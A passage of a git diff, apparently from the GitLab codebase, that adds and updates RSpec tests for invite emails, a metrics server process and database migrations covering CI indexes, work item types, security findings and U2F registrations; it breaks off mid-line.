show Gmail Actions Join now link' it_behaves_like "a user cannot unsubscribe through footer link" it_behaves_like 'appearance header and footer enabled' it_behaves_like 'appearance header and footer not enabled' @@ -845,48 +867,6 @@ RSpec.describe Notify do end end - context 'with invite_email_preview_text enabled', :experiment do - before do - stub_experiments(invite_email_preview_text: :control) - end - - it 'has the correct invite_url with params' do - is_expected.to have_link('Join now', - href: invite_url(project_member.invite_token, - invite_type: Emails::Members::INITIAL_INVITE, - experiment_name: 'invite_email_preview_text')) - end - - it 'tracks the sent invite' do - expect(experiment(:invite_email_preview_text)).to track(:assignment) - .with_context(actor: project_member) - .on_next_instance - - invite_email.deliver_now - end - end - - context 'with invite_email_from enabled', :experiment do - before do - stub_experiments(invite_email_from: :control) - end - - it 'has the correct invite_url with params' do - is_expected.to have_link('Join now', - href: invite_url(project_member.invite_token, - invite_type: Emails::Members::INITIAL_INVITE, - experiment_name: 'invite_email_from')) - end - - it 'tracks the sent invite' do - expect(experiment(:invite_email_from)).to track(:assignment) - .with_context(actor: project_member) - .on_next_instance - - invite_email.deliver_now - end - end - context 'when invite email sent is tracked', :snowplow do it 'tracks the sent invite' do invite_email.deliver_now @@ -1460,7 +1440,7 @@ RSpec.describe Notify do subject { described_class.member_invited_email('Group', group_member.id, group_member.invite_token) } it_behaves_like 'an email sent from GitLab' - it_behaves_like 'it should not have Gmail Actions links' + it_behaves_like 'it should show Gmail Actions Join now link' it_behaves_like "a user cannot unsubscribe through footer link" it_behaves_like 'appearance header and footer enabled' it_behaves_like 'appearance header and footer not enabled' diff --git a/spec/metrics_server/metrics_server_spec.rb b/spec/metrics_server/metrics_server_spec.rb new file mode 100644 index 00000000000..4e3c6900875 --- /dev/null +++ b/spec/metrics_server/metrics_server_spec.rb @@ -0,0 +1,109 @@ +# frozen_string_literal: true + +require 'fast_spec_helper' + +require_relative '../../metrics_server/metrics_server' +require_relative '../support/helpers/next_instance_of' + +RSpec.describe MetricsServer do # rubocop:disable RSpec/FilePath + include NextInstanceOf + + before do + # We do not want this to have knock-on effects on the test process. + allow(Gitlab::ProcessManagement).to receive(:modify_signals) + end + + describe '.spawn' do + context 'when in parent process' do + it 'forks into a new process and detaches it' do + expect(Process).to receive(:fork).and_return(99) + expect(Process).to receive(:detach).with(99) + + described_class.spawn('sidekiq', metrics_dir: 'path/to/metrics') + end + end + + context 'when in child process' do + before do + # This signals the process that it's "inside" the fork + expect(Process).to receive(:fork).and_return(nil) + expect(Process).not_to receive(:detach) + end + + it 'starts the metrics server with the given arguments' do + expect_next_instance_of(MetricsServer) do |server| + expect(server).to receive(:start) + end + + described_class.spawn('sidekiq', metrics_dir: 'path/to/metrics') + end + + it 'resets signal handlers from parent process' do + expect(Gitlab::ProcessManagement).to receive(:modify_signals).with(%i[A B], 'DEFAULT') + + described_class.spawn('sidekiq', metrics_dir: 'path/to/metrics', trapped_signals: %i[A B]) + end + end + end + + describe '#start' do + let(:exporter_class) { Class.new(Gitlab::Metrics::Exporter::BaseExporter) } + let(:exporter_double) { double('fake_exporter', start: true) } + let(:prometheus_config) { ::Prometheus::Client.configuration } + let(:metrics_dir) { Dir.mktmpdir } + let(:settings) { { "fake_exporter" => { "enabled" => true } } } + let!(:old_metrics_dir) { prometheus_config.multiprocess_files_dir } + + subject(:metrics_server) { described_class.new('fake', metrics_dir, true)} + + before do + stub_const('Gitlab::Metrics::Exporter::FakeExporter', exporter_class) + expect(exporter_class).to receive(:instance).with(settings['fake_exporter'], synchronous: true).and_return(exporter_double) + expect(Settings).to receive(:monitoring).and_return(settings) + end + + after do + Gitlab::Metrics.reset_registry! + FileUtils.rm_rf(metrics_dir, secure: true) + prometheus_config.multiprocess_files_dir = old_metrics_dir + end + + it 'configures ::Prometheus::Client' do + metrics_server.start + + expect(prometheus_config.multiprocess_files_dir).to eq metrics_dir + end + + it 'ensures that metrics directory exists in correct mode (0700)' do + expect(FileUtils).to receive(:mkdir_p).with(metrics_dir, mode: 0700) + + metrics_server.start + end + + context 'when wipe_metrics_dir is true' do + subject(:metrics_server) { described_class.new('fake', metrics_dir, true)} + + it 'removes any old metrics files' do + FileUtils.touch("#{metrics_dir}/remove_this.db") + + expect { metrics_server.start }.to change { Dir.empty?(metrics_dir) }.from(false).to(true) + end + end + + context 'when wipe_metrics_dir is false' do + subject(:metrics_server) { described_class.new('fake', metrics_dir, false)} + + it 'does not remove any old metrics files' do + FileUtils.touch("#{metrics_dir}/remove_this.db") + + expect { metrics_server.start }.not_to change { Dir.empty?(metrics_dir) }.from(false) + end + end + + it 'starts a metrics server' do + expect(exporter_double).to receive(:start) + + metrics_server.start + end + end +end diff --git a/spec/migrations/20210713042000_fix_ci_sources_pipelines_index_names_spec.rb b/spec/migrations/20210713042000_fix_ci_sources_pipelines_index_names_spec.rb new file mode 100644 index 00000000000..adec1e05533 --- /dev/null +++ b/spec/migrations/20210713042000_fix_ci_sources_pipelines_index_names_spec.rb @@ -0,0 +1,67 @@ +# frozen_string_literal: true + +require 'spec_helper' +require_migration! + +RSpec.describe FixCiSourcesPipelinesIndexNames, :migration do + def validate_foreign_keys_and_index! + aggregate_failures do + expect(subject.foreign_key_exists?(:ci_sources_pipelines, :ci_builds, column: :source_job_id, name: 'fk_be5624bf37')).to be_truthy + expect(subject.foreign_key_exists?(:ci_sources_pipelines, :ci_pipelines, column: :pipeline_id, name: 'fk_e1bad85861')).to be_truthy + expect(subject.foreign_key_exists?(:ci_sources_pipelines, :ci_pipelines, column: :source_pipeline_id, name: 'fk_d4e29af7d7')).to be_truthy + expect(subject.foreign_key_exists?(:ci_sources_pipelines, :projects, column: :source_project_id, name: 'fk_acd9737679')).to be_truthy + expect(subject.foreign_key_exists?(:ci_sources_pipelines, :projects, name: 'fk_1e53c97c0a')).to be_truthy + expect(subject.foreign_key_exists?(:ci_sources_pipelines, :ci_builds, column: :source_job_id_convert_to_bigint, name: 'fk_be5624bf37_tmp')).to be_falsey + + expect(subject.index_exists_by_name?(:ci_sources_pipelines, described_class::NEW_INDEX_NAME)).to be_truthy + expect(subject.index_exists_by_name?(:ci_sources_pipelines, described_class::OLD_INDEX_NAME)).to be_falsey + end + end + + it 'existing foreign keys and indexes are untouched' do + validate_foreign_keys_and_index! + + migrate! + + validate_foreign_keys_and_index! + end + + context 'with a legacy (pre-GitLab 10.0) foreign key' do + let(:old_foreign_keys) { described_class::OLD_TO_NEW_FOREIGN_KEY_DEFS.keys } + let(:new_foreign_keys) { described_class::OLD_TO_NEW_FOREIGN_KEY_DEFS.values.map { |entry| entry[:name] } } + + before do + new_foreign_keys.each { |name| subject.remove_foreign_key_if_exists(:ci_sources_pipelines, name: name) } + + # GitLab 9.5.4: https://gitlab.com/gitlab-org/gitlab/-/blob/v9.5.4-ee/db/schema.rb#L2026-2030 + subject.add_foreign_key(:ci_sources_pipelines, :ci_builds, column: :source_job_id, name: 'fk_3f0c88d7dc', on_delete: :cascade) + subject.add_foreign_key(:ci_sources_pipelines, :ci_pipelines, column: :pipeline_id, name: "fk_b8c0fac459", on_delete: :cascade) + subject.add_foreign_key(:ci_sources_pipelines, :ci_pipelines, column: :source_pipeline_id, name: "fk_3a3e3cb83a", on_delete: :cascade) + subject.add_foreign_key(:ci_sources_pipelines, :projects, column: :source_project_id, name: "fk_8868d0f3e4", on_delete: :cascade) + subject.add_foreign_key(:ci_sources_pipelines, :projects, name: "fk_83b4346e48", on_delete: :cascade) + + # https://gitlab.com/gitlab-org/gitlab/-/blob/v9.5.4-ee/db/schema.rb#L443 + subject.add_index "ci_sources_pipelines", ["source_job_id"], name: described_class::OLD_INDEX_NAME, using: :btree + end + + context 'when new index already exists' do + it 'corrects foreign key constraints and drops old index' do + expect { migrate! }.to change { subject.foreign_key_exists?(:ci_sources_pipelines, :ci_builds, column: :source_job_id, name: 'fk_3f0c88d7dc') }.from(true).to(false) + + validate_foreign_keys_and_index! + end + end + + context 'when new index does not exist' do + before do + subject.remove_index("ci_sources_pipelines", name: described_class::NEW_INDEX_NAME) + end + + it 'drops the old index' do + expect { migrate! }.to change { subject.index_exists_by_name?(:ci_sources_pipelines, described_class::OLD_INDEX_NAME) }.from(true).to(false) + + validate_foreign_keys_and_index! + end + end + end +end diff --git a/spec/migrations/20210804150320_create_base_work_item_types_spec.rb b/spec/migrations/20210804150320_create_base_work_item_types_spec.rb index 34ea7f53f51..6df8e1b2ebf 100644 --- a/spec/migrations/20210804150320_create_base_work_item_types_spec.rb +++ b/spec/migrations/20210804150320_create_base_work_item_types_spec.rb @@ -4,18 +4,28 @@ require 'spec_helper' require_migration! RSpec.describe CreateBaseWorkItemTypes, :migration do - let!(:work_item_types) { table(:work_item_types) } + include MigrationHelpers::WorkItemTypesHelper + + let_it_be(:work_item_types) { table(:work_item_types) } + + let(:base_types) do + { + issue: 0, + incident: 1, + test_case: 2, + requirement: 3 + } + end after(:all) do # Make sure base types are recreated after running the migration # because migration specs are not run in a transaction - WorkItem::Type.delete_all - Gitlab::DatabaseImporters::WorkItems::BaseTypeImporter.import + reset_work_item_types end it 'creates default data' do # Need to delete all as base types are seeded before entire test suite - WorkItem::Type.delete_all + work_item_types.delete_all reversible_migration do |migration| migration.before -> { @@ -24,8 +34,8 @@ RSpec.describe CreateBaseWorkItemTypes, :migration do } migration.after -> { - expect(work_item_types.count).to eq 4 - expect(work_item_types.all.pluck(:base_type)).to match_array WorkItem::Type.base_types.values + expect(work_item_types.count).to eq(4) + expect(work_item_types.all.pluck(:base_type)).to match_array(base_types.values) } end end diff --git a/spec/migrations/20210831203408_upsert_base_work_item_types_spec.rb b/spec/migrations/20210831203408_upsert_base_work_item_types_spec.rb index 3c8c55ccb80..1957a973ee1 100644 --- a/spec/migrations/20210831203408_upsert_base_work_item_types_spec.rb +++ b/spec/migrations/20210831203408_upsert_base_work_item_types_spec.rb @@ -4,19 +4,29 @@ require 'spec_helper' require_migration! RSpec.describe UpsertBaseWorkItemTypes, :migration do - let!(:work_item_types) { table(:work_item_types) } + include MigrationHelpers::WorkItemTypesHelper + + let_it_be(:work_item_types) { table(:work_item_types) } + + let(:base_types) do + { + issue: 0, + incident: 1, + test_case: 2, + requirement: 3 + } + end after(:all) do # Make sure base types are recreated after running the migration # because migration specs are not run in a transaction - WorkItem::Type.delete_all - Gitlab::DatabaseImporters::WorkItems::BaseTypeImporter.import + reset_work_item_types end context 'when no default types exist' do it 'creates default data' do # Need to delete all as base types are seeded before entire test suite - WorkItem::Type.delete_all + work_item_types.delete_all expect(work_item_types.count).to eq(0) @@ -29,7 +39,7 @@ RSpec.describe UpsertBaseWorkItemTypes, :migration do migration.after -> { expect(work_item_types.count).to eq(4) - expect(work_item_types.all.pluck(:base_type)).to match_array(WorkItem::Type.base_types.values) + expect(work_item_types.all.pluck(:base_type)).to match_array(base_types.values) } end end @@ -37,16 +47,21 @@ RSpec.describe UpsertBaseWorkItemTypes, :migration do context 'when default types already exist' do it 'does not create default types again' do - expect(work_item_types.all.pluck(:base_type)).to match_array(WorkItem::Type.base_types.values) + # Database needs to be in a similar state as when this migration was created + work_item_types.delete_all + work_item_types.find_or_create_by!(name: 'Issue', namespace_id: nil, base_type: base_types[:issue], icon_name: 'issue-type-issue') + work_item_types.find_or_create_by!(name: 'Incident', namespace_id: nil, base_type: base_types[:incident], icon_name: 'issue-type-incident') + work_item_types.find_or_create_by!(name: 'Test Case', namespace_id: nil, base_type: base_types[:test_case], icon_name: 'issue-type-test-case') + work_item_types.find_or_create_by!(name: 'Requirement', namespace_id: nil, base_type: base_types[:requirement], icon_name: 'issue-type-requirements') reversible_migration do |migration| migration.before -> { - expect(work_item_types.all.pluck(:base_type)).to match_array(WorkItem::Type.base_types.values) + expect(work_item_types.all.pluck(:base_type)).to match_array(base_types.values) } migration.after -> { expect(work_item_types.count).to eq(4) - expect(work_item_types.all.pluck(:base_type)).to match_array(WorkItem::Type.base_types.values) + expect(work_item_types.all.pluck(:base_type)).to match_array(base_types.values) } end end diff --git a/spec/migrations/20211101222614_consume_remaining_user_namespace_jobs_spec.rb b/spec/migrations/20211101222614_consume_remaining_user_namespace_jobs_spec.rb new file mode 100644 index 00000000000..d78ecc26ebf --- /dev/null +++ b/spec/migrations/20211101222614_consume_remaining_user_namespace_jobs_spec.rb @@ -0,0 +1,21 @@ +# frozen_string_literal: true + +require 'spec_helper' +require_migration! + +RSpec.describe ConsumeRemainingUserNamespaceJobs do + let(:namespaces) { table(:namespaces) } + let!(:namespace) { namespaces.create!(name: 'gitlab', path: 'gitlab-org', type: nil) } + + context 'when Namespaces with nil `type` still exist' do + it 'steals sidekiq jobs from BackfillUserNamespace background migration' do + expect(Gitlab::BackgroundMigration).to receive(:steal).with('BackfillUserNamespace') + + migrate! + end + + it 'migrates namespaces without type' do + expect { migrate! }.to change { namespaces.where(type: 'User').count }.from(0).to(1) + end + end +end diff --git a/spec/migrations/20211110143306_add_not_null_constraint_to_security_findings_uuid_spec.rb b/spec/migrations/20211110143306_add_not_null_constraint_to_security_findings_uuid_spec.rb new file mode 100644 index 00000000000..946fbf7f568 --- /dev/null +++ b/spec/migrations/20211110143306_add_not_null_constraint_to_security_findings_uuid_spec.rb @@ -0,0 +1,23 @@ +# frozen_string_literal: true +require 'spec_helper' +require_migration! + +RSpec.describe AddNotNullConstraintToSecurityFindingsUuid do + let_it_be(:security_findings) { table(:security_findings) } + let_it_be(:migration) { described_class.new } + + before do + allow(migration).to receive(:transaction_open?).and_return(false) + allow(migration).to receive(:with_lock_retries).and_yield + end + + it 'adds a check constraint' do + constraint = security_findings.connection.check_constraints(:security_findings).find { |constraint| constraint.expression == "uuid IS NOT NULL" } + expect(constraint).to be_nil + + migration.up + + constraint = security_findings.connection.check_constraints(:security_findings).find { |constraint| constraint.expression == "uuid IS NOT NULL" } + expect(constraint).to be_a(ActiveRecord::ConnectionAdapters::CheckConstraintDefinition) + end +end diff --git a/spec/migrations/20211110151350_schedule_drop_invalid_security_findings_spec.rb b/spec/migrations/20211110151350_schedule_drop_invalid_security_findings_spec.rb new file mode 100644 index 00000000000..b35cf5cbf4c --- /dev/null +++ b/spec/migrations/20211110151350_schedule_drop_invalid_security_findings_spec.rb @@ -0,0 +1,71 @@ +# frozen_string_literal: true + +require 'spec_helper' +require_migration! + +RSpec.describe ScheduleDropInvalidSecurityFindings, :migration, schema: 20211108211434 do + let_it_be(:background_migration_jobs) { table(:background_migration_jobs) } + + let_it_be(:namespace) { table(:namespaces).create!(name: 'user', path: 'user', type: Namespaces::UserNamespace.sti_name) } + let_it_be(:project) { table(:projects).create!(namespace_id: namespace.id) } + + let_it_be(:pipelines) { table(:ci_pipelines) } + let_it_be(:pipeline) { pipelines.create!(project_id: project.id) } + + let_it_be(:ci_builds) { table(:ci_builds) } + let_it_be(:ci_build) { ci_builds.create! } + + let_it_be(:security_scans) { table(:security_scans) } + let_it_be(:security_scan) do + security_scans.create!( + scan_type: 1, + status: 1, + build_id: ci_build.id, + project_id: project.id, + pipeline_id: pipeline.id + ) + end + + let_it_be(:vulnerability_scanners) { table(:vulnerability_scanners) } + let_it_be(:vulnerability_scanner) { vulnerability_scanners.create!(project_id: project.id, external_id: 'test 1', name: 'test scanner 1') } + + let_it_be(:security_findings) { table(:security_findings) } + let_it_be(:security_finding_without_uuid) do + security_findings.create!( + severity: 1, + confidence: 1, + scan_id: security_scan.id, + scanner_id: vulnerability_scanner.id, + uuid: nil + ) + end + + let_it_be(:security_finding_with_uuid) do + security_findings.create!( + severity: 1, + confidence: 1, + scan_id: security_scan.id, + scanner_id: vulnerability_scanner.id, + uuid: 'bd95c085-71aa-51d7-9bb6-08ae669c262e' + ) + end + + before do + stub_const("#{described_class}::BATCH_SIZE", 1) + stub_const("#{described_class}::SUB_BATCH_SIZE", 1) + end + + around do |example| + freeze_time { Sidekiq::Testing.fake! { example.run } } + end + + it 'schedules background migrations' do + migrate! + + expect(background_migration_jobs.count).to eq(1) + expect(background_migration_jobs.first.arguments).to match_array([security_finding_without_uuid.id, security_finding_without_uuid.id, described_class::SUB_BATCH_SIZE]) + + expect(BackgroundMigrationWorker.jobs.size).to eq(1) + expect(described_class::MIGRATION).to be_scheduled_delayed_migration(2.minutes, security_finding_without_uuid.id, security_finding_without_uuid.id, described_class::SUB_BATCH_SIZE) + end +end diff --git a/spec/migrations/20211116091751_change_namespace_type_default_to_user_spec.rb b/spec/migrations/20211116091751_change_namespace_type_default_to_user_spec.rb new file mode 100644 index 00000000000..deba6f9b87c --- /dev/null +++ b/spec/migrations/20211116091751_change_namespace_type_default_to_user_spec.rb @@ -0,0 +1,5 @@ +# frozen_string_literal: true + +# With https://gitlab.com/gitlab-org/gitlab/-/merge_requests/73495, we no longer allow +# a Namespace type to be nil. There is nothing left to test for this migration, +# but we'll keep this file here as a tombstone. diff --git a/spec/migrations/20211116111644_schedule_remove_occurrence_pipelines_and_duplicate_vulnerabilities_findings_spec.rb b/spec/migrations/20211116111644_schedule_remove_occurrence_pipelines_and_duplicate_vulnerabilities_findings_spec.rb new file mode 100644 index 00000000000..c1d96f50dc8 --- /dev/null +++ b/spec/migrations/20211116111644_schedule_remove_occurrence_pipelines_and_duplicate_vulnerabilities_findings_spec.rb @@ -0,0 +1,191 @@ +# frozen_string_literal: true +require 'spec_helper' + +require_migration! + +RSpec.describe ScheduleRemoveOccurrencePipelinesAndDuplicateVulnerabilitiesFindings, :migration do + let_it_be(:background_migration_jobs) { table(:background_migration_jobs) } + let_it_be(:namespace) { table(:namespaces).create!(name: 'user', path: 'user') } + let_it_be(:users) { table(:users) } + let_it_be(:user) { create_user! } + let_it_be(:project) { table(:projects).create!(id: 14219619, namespace_id: namespace.id) } + let_it_be(:pipelines) { table(:ci_pipelines) } + let_it_be(:scanners) { table(:vulnerability_scanners) } + let_it_be(:scanner1) { scanners.create!(project_id: project.id, external_id: 'test 1', name: 'test scanner 1') } + let_it_be(:scanner2) { scanners.create!(project_id: project.id, external_id: 'test 2', name: 'test scanner 2') } + let_it_be(:scanner3) { scanners.create!(project_id: project.id, external_id: 'test 3', name: 'test scanner 3') } + let_it_be(:unrelated_scanner) { scanners.create!(project_id: project.id, external_id: 'unreleated_scanner', name: 'unrelated scanner') } + let_it_be(:vulnerabilities) { table(:vulnerabilities) } + let_it_be(:vulnerability_findings) { table(:vulnerability_occurrences) } + let_it_be(:vulnerability_finding_pipelines) { table(:vulnerability_occurrence_pipelines) } + let_it_be(:vulnerability_identifiers) { table(:vulnerability_identifiers) } + let_it_be(:vulnerability_identifier) do + vulnerability_identifiers.create!( + id: 1244459, + project_id: project.id, + external_type: 'vulnerability-identifier', + external_id: 'vulnerability-identifier', + fingerprint: '0a203e8cd5260a1948edbedc76c7cb91ad6a2e45', + name: 'vulnerability identifier') + end + + let_it_be(:vulnerability_for_first_duplicate) do + create_vulnerability!( + project_id: project.id, + author_id: user.id + ) + end + + let_it_be(:first_finding_duplicate) do + create_finding!( + id: 5606961, + uuid: "bd95c085-71aa-51d7-9bb6-08ae669c262e", + vulnerability_id: vulnerability_for_first_duplicate.id, + report_type: 0, + location_fingerprint: '00049d5119c2cb3bfb3d1ee1f6e031fe925aed75', + primary_identifier_id: vulnerability_identifier.id, + scanner_id: scanner1.id, + project_id: project.id + ) + end + + let_it_be(:vulnerability_for_second_duplicate) do + create_vulnerability!( + project_id: project.id, + author_id: user.id + ) + end + + let_it_be(:second_finding_duplicate) do + create_finding!( + id: 8765432, + uuid: "5b714f58-1176-5b26-8fd5-e11dfcb031b5", + vulnerability_id: vulnerability_for_second_duplicate.id, + report_type: 0, + location_fingerprint: '00049d5119c2cb3bfb3d1ee1f6e031fe925aed75', + primary_identifier_id: vulnerability_identifier.id, + scanner_id: scanner2.id, + project_id: project.id + ) + end + + let_it_be(:vulnerability_for_third_duplicate) do + create_vulnerability!( + project_id: project.id, + author_id: user.id + ) + end + + let_it_be(:third_finding_duplicate) do + create_finding!( + id: 8832995, + uuid: "cfe435fa-b25b-5199-a56d-7b007cc9e2d4", + vulnerability_id: vulnerability_for_third_duplicate.id, + report_type: 0, + location_fingerprint: '00049d5119c2cb3bfb3d1ee1f6e031fe925aed75', + primary_identifier_id: vulnerability_identifier.id, + scanner_id: scanner3.id, + project_id: project.id + ) + end + + let_it_be(:unrelated_finding) do + create_finding!( + id: 9999999, + uuid: "unreleated_finding", + vulnerability_id: nil, + report_type: 1, + location_fingerprint: 'random_location_fingerprint', + primary_identifier_id: vulnerability_identifier.id, + scanner_id: unrelated_scanner.id, + project_id: project.id + ) + end + + before do + stub_const("#{described_class}::BATCH_SIZE", 1) + + 4.times do + create_finding_pipeline!(project_id: project.id, finding_id: first_finding_duplicate.id) + create_finding_pipeline!(project_id: project.id, finding_id: second_finding_duplicate.id) + create_finding_pipeline!(project_id: project.id, finding_id: third_finding_duplicate.id) + create_finding_pipeline!(project_id: project.id, finding_id: unrelated_finding.id) + end + end + + around do |example| + freeze_time { Sidekiq::Testing.fake! { example.run } } + end + + it 'schedules background migrations' do + migrate! + + expect(background_migration_jobs.count).to eq(4) + expect(background_migration_jobs.first.arguments).to match_array([first_finding_duplicate.id, first_finding_duplicate.id]) + expect(background_migration_jobs.second.arguments).to match_array([second_finding_duplicate.id, second_finding_duplicate.id]) + expect(background_migration_jobs.third.arguments).to match_array([third_finding_duplicate.id, third_finding_duplicate.id]) + expect(background_migration_jobs.fourth.arguments).to match_array([unrelated_finding.id, unrelated_finding.id]) + + expect(BackgroundMigrationWorker.jobs.size).to eq(4) + expect(described_class::MIGRATION).to be_scheduled_delayed_migration(2.minutes, first_finding_duplicate.id, first_finding_duplicate.id) + expect(described_class::MIGRATION).to be_scheduled_delayed_migration(4.minutes, second_finding_duplicate.id, second_finding_duplicate.id) + expect(described_class::MIGRATION).to be_scheduled_delayed_migration(6.minutes, third_finding_duplicate.id, third_finding_duplicate.id) + expect(described_class::MIGRATION).to be_scheduled_delayed_migration(8.minutes, unrelated_finding.id, unrelated_finding.id) + end + + private + + def create_vulnerability!(project_id:, author_id:, title: 'test', severity: 7, confidence: 7, report_type: 0) + vulnerabilities.create!( + project_id: project_id, + author_id: author_id, + title: title, + severity: severity, + confidence: confidence, + report_type: report_type + ) + end + + # rubocop:disable Metrics/ParameterLists + def create_finding!( + id: nil, + vulnerability_id:, project_id:, scanner_id:, primary_identifier_id:, + name: "test", severity: 7, confidence: 7, report_type: 0, + project_fingerprint: '123qweasdzxc', location_fingerprint: 'test', + metadata_version: 'test', raw_metadata: 'test', uuid: 'test') + params = { + vulnerability_id: vulnerability_id, + project_id: project_id, + name: name, + severity: severity, + confidence: confidence, + report_type: report_type, + project_fingerprint: project_fingerprint, + scanner_id: scanner_id, + primary_identifier_id: vulnerability_identifier.id, + location_fingerprint: location_fingerprint, + metadata_version: metadata_version, + raw_metadata: raw_metadata, + uuid: uuid + } + params[:id] = id unless id.nil? + vulnerability_findings.create!(params) + end + # rubocop:enable Metrics/ParameterLists + + def create_user!(name: "Example User", email: "user@example.com", user_type: nil, created_at: Time.zone.now, confirmed_at: Time.zone.now) + users.create!( + name: name, + email: email, + username: name, + projects_limit: 0, + user_type: user_type, + confirmed_at: confirmed_at + ) + end + + def create_finding_pipeline!(project_id:, finding_id:) + pipeline = pipelines.create!(project_id: project_id) + vulnerability_finding_pipelines.create!(pipeline_id: pipeline.id, occurrence_id: finding_id) + end +end diff --git a/spec/migrations/20211117084814_migrate_remaining_u2f_registrations_spec.rb b/spec/migrations/20211117084814_migrate_remaining_u2f_registrations_spec.rb new file mode 100644 index 00000000000..6a82ed016af --- /dev/null +++ b/spec/migrations/20211117084814_migrate_remaining_u2f_registrations_spec.rb @@ -0,0 +1,43 @@ +# frozen_string_literal: true + +require 'spec_helper' +require_migration! + +RSpec.describe MigrateRemainingU2fRegistrations, :migration do + let(:u2f_registrations) { table(:u2f_registrations) } + let(:webauthn_registrations) { table(:webauthn_registrations) } + let(:users) { table(:users) } + + let(:user) { users.create!(email: 'email@email.com', name: 'foo', username: 'foo', projects_limit: 0) } + + before do + create_u2f_registration(1, 'reg1') + create_u2f_registration(2, 'reg2') + create_u2f_registration(3, '') + create_u2f_registration(4, nil) + webauthn_registrations.create!({ name: 'reg1', u2f_registration_id: 1, credential_xid: '', public_key: '', user_id: user.id }) + end + + it 'correctly migrates u2f registrations previously not migrated' do + expect { migrate! }.to change { webauthn_registrations.count }.from(1).to(4) + end + + it 'migrates all valid u2f registrations depite errors' do + create_u2f_registration(5, 'reg3', 'invalid!') + create_u2f_registration(6, 'reg4') + + expect { migrate! }.to change { webauthn_registrations.count }.from(1).to(5) + end + + def create_u2f_registration(id, name, public_key = nil) + device = U2F::FakeU2F.new(FFaker::BaconIpsum.characters(5), { key_handle: SecureRandom.random_bytes(255) }) + public_key ||= Base64.strict_encode64(device.origin_public_key_raw) + u2f_registrations.create!({ id: id, + certificate: Base64.strict_encode64(device.cert_raw), + key_handle: U2F.urlsafe_encode64(device.key_handle_raw), + public_key: public_key, + counter: 5, + name: name, + user_id: user.id }) + end +end diff --git a/spec/migrations/20211126115449_encrypt_static_objects_external_storage_auth_token_spec.rb b/spec/migrations/20211126115449_encrypt_static_objects_external_storage_auth_token_spec.rb new file mode 100644 index 00000000000..bc8b7c56676 --- /dev/null +++ b/spec/migrations/20211126115449_encrypt_static_objects_external_storage_auth_token_spec.rb @@ -0,0 +1,56 @@ +# frozen_string_literal: true + +require 'spec_helper' +require_migration! + +RSpec.describe EncryptStaticObjectsExternalStorageAuthToken, :migration do + let(:application_settings) do + Class.new(ActiveRecord::Base) do + self.table_name = 'application_settings' + end + end + + context 'when static_objects_external_storage_auth_token is not set' do + it 'does nothing' do + application_settings.create! + + reversible_migration do |migration| + migration.before -> { + settings = application_settings.first + + expect(settings.static_objects_external_storage_auth_token).to be_nil + expect(settings.static_objects_external_storage_auth_token_encrypted).to be_nil + } + + migration.after -> { + settings = application_settings.first + + expect(settings.static_objects_external_storage_auth_token).to be_nil + expect(settings.static_objects_external_storage_auth_token_encrypted).to be_nil + } + end + end + end + + context 'when static_objects_external_storage_auth_token is set' do + it 'encrypts static_objects_external_storage_auth_token' do + settings = application_settings.create! + settings.update_column(:static_objects_external_storage_auth_token, 'Test') + + reversible_migration do |migration| + migration.before -> { + settings = application_settings.first + + expect(settings.static_objects_external_storage_auth_token).to eq('Test') + expect(settings.static_objects_external_storage_auth_token_encrypted).to be_nil + } + migration.after -> { + settings = application_settings.first + + expect(settings.static_objects_external_storage_auth_token).to eq('Test') + expect(settings.static_objects_external_storage_auth_token_encrypted).to be_present + } + end + end + end +end diff --git a/spec/migrations/20211126204445_add_task_to_work_item_types_spec.rb b/spec/migrations/20211126204445_add_task_to_work_item_types_spec.rb new file mode 100644 index 00000000000..b80e4703f07 --- /dev/null +++ b/spec/migrations/20211126204445_add_task_to_work_item_types_spec.rb @@ -0,0 +1,54 @@ +# frozen_string_literal: true + +require 'spec_helper' +require_migration! + +RSpec.describe AddTaskToWorkItemTypes, :migration do + include MigrationHelpers::WorkItemTypesHelper + + let_it_be(:work_item_types) { table(:work_item_types) } + + let(:base_types) do + { + issue: 0, + incident: 1, + test_case: 2, + requirement: 3, + task: 4 + } + end + + after(:all) do + # Make sure base types are recreated after running the migration + # because migration specs are not run in a transaction + reset_work_item_types + end + + it 'skips creating the record if it already exists' do + reset_db_state_prior_to_migration + work_item_types.find_or_create_by!(name: 'Task', namespace_id: nil, base_type: base_types[:task], icon_name: 'issue-type-task') + + expect do + migrate! + end.to not_change(work_item_types, :count) + end + + it 'adds task to base work item types' do + reset_db_state_prior_to_migration + + expect do + migrate! + end.to change(work_item_types, :count).from(4).to(5) + + expect(work_item_types.all.pluck(:base_type)).to include(base_types[:task]) + end + + def reset_db_state_prior_to_migration + # Database needs to be in a similar state as when this migration was created + work_item_types.delete_all + work_item_types.find_or_create_by!(name: 'Issue', namespace_id: nil, base_type: base_types[:issue], icon_name: 'issue-type-issue') + work_item_types.find_or_create_by!(name: 'Incident', namespace_id: nil, base_type: base_types[:incident], icon_name: 'issue-type-incident') + work_item_types.find_or_create_by!(name: 'Test Case', namespace_id: nil, base_type: base_types[:test_case], icon_name: 'issue-type-test-case') + work_item_types.find_or_create_by!(name: 'Requirement', namespace_id: nil, base_type: base_types[:requirement], icon_name: 'issue-type-requirements') + end +end diff --git a/spec/migrations/20211130165043_backfill_sequence_column_for_sprints_table_spec.rb b/spec/migrations/20211130165043_backfill_sequence_column_for_sprints_table_spec.rb new file mode 100644 index 00000000000..809ee53462f --- /dev/null +++ b/spec/migrations/20211130165043_backfill_sequence_column_for_sprints_table_spec.rb @@ -0,0 +1,42 @@ +# frozen_string_literal: true + +require 'spec_helper' + +require_migration! + +RSpec.describe BackfillSequenceColumnForSprintsTable, :migration, schema: 20211126042235 do + let(:migration) { described_class.new } + let(:namespaces) { table(:namespaces) } + let(:sprints) { table(:sprints) } + let(:iterations_cadences) { table(:iterations_cadences) } + + let!(:group) { namespaces.create!(name: 'foo', path: 'foo') } + let!(:cadence_1) { iterations_cadences.create!(group_id: group.id, title: "cadence 1") } + let!(:cadence_2) { iterations_cadences.create!(group_id: group.id, title: "cadence 2") } + let!(:iteration_1) { sprints.create!(id: 1, group_id: group.id, iterations_cadence_id: cadence_1.id, start_date: Date.new(2021, 11, 1), due_date: Date.new(2021, 11, 5), iid: 1, title: 'a' ) } + let!(:iteration_2) { sprints.create!(id: 2, group_id: group.id, iterations_cadence_id: cadence_1.id, start_date: Date.new(2021, 12, 1), due_date: Date.new(2021, 12, 5), iid: 2, title: 'b') } + let!(:iteration_3) { sprints.create!(id: 3, group_id: group.id, iterations_cadence_id: cadence_2.id, start_date: Date.new(2021, 12, 1), due_date: Date.new(2021, 12, 5), iid: 4, title: 'd') } + let!(:iteration_4) { sprints.create!(id: 4, group_id: group.id, 